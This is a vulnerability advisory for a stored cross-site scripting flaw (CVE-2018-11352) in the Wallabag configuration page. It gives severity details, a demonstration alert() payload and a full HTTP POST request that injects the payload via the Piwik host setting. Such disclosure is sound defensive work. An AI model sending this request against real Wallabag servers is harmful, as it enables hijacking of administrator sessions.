Wallabag 2.2.3 to 2.3.2 - Stored Cross-Site Scripting

The Wallabag application is affected by one cross-site scripting (XSS) vulnerability that is stored within the configuration page. This vulnerability enables the execution of a JavaScript payload each time an administrator visits the configuration page. The vulnerability can be exploited with authentication and used to target administrators and steal their sessions.

Product Description

Wallabag is an open source RSS reader application, distributed under an MIT license. The project official website is wallabag.org. The vulnerability described in this document affects version 2.2.3 (released on May 18, 2017) through version 2.3.2 (released on January 22, 2018).

Vulnerabilities List

One vulnerability was identified within the Wallabag web application:
One instance of stored cross-site scripting

Affected Version

Version 2.2.3 to 2.3.2

Vulnerability Details

• CVE ID: CVE-2018-11352
• Access Vector: Remote
• Security Risk: Medium
• Vulnerability: CWE-79
• CVSS Base Score: 4.9
• CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

The XSS vulnerability is located on the internal settings configuration page. By injecting a JavaScript payload in this page, an attacker can steal an administrator session. An admin account is required to exploit this instance. The vulnerable parameter is craue_config_modifySettings[settings][23][value]. To trigger the vulnerability, Piwik must be enabled, which can be done by setting the value 1 to the parameter craue_config_modifySettings[settings][22][value]. The following payload can be used to demonstrate the attack:

";</script><script>alert(/XSS/)</script>

Figure 1 - XSS Payload

The request below can be used to exploit the vulnerability:

POST /settings HTTP/1.1
Host: HOST
Cookie: PHPSESSID=SESSIONID

craue_config_modifySettings%5Bsettings%5D%5B22%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B23%5D%5Bvalue%5D=v2.wallabag.org%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&craue_config_modifySettings%5Bsettings%5D%5B24%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B0%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B1%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B2%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B3%5D%5Bvalue%5D=http%3A%2F%2Fdiasporapod.com&craue_config_modifySettings%5Bsettings%5D%5B4%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B5%5D%5Bvalue%5D=https%3A%2F%2Funmark.it&craue_config_modifySettings%5Bsettings%5D%5B6%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B7%5D%5Bvalue%5D=http%3A%2F%2Fmyshaarli.com&craue_config_modifySettings%5Bsettings%5D%5B8%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B9%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B19%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B28%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B10%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B11%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B12%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B13%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B14%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B15%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B16%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B17%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B18%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B20%5D%5Bvalue%5D=https%3A%2F%2Fwww.wallabag.org%2Fpages%2Fsupport.html&craue_config_modifySettings%5Bsettings%5D%5B21%5D%5Bvalue%5D=&craue_config_modifySettings%5Bsettings%5D%5B25%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B26%5D%5Bvalue%5D=wallabag&craue_config_modifySettings%5Bsettings%5D%5B27%5D%5Bvalue%5D=0&action=&craue_config_modifySettings%5B_token%5D=CSRFTOKEN

 Figure 2 - XSS Exploitation Request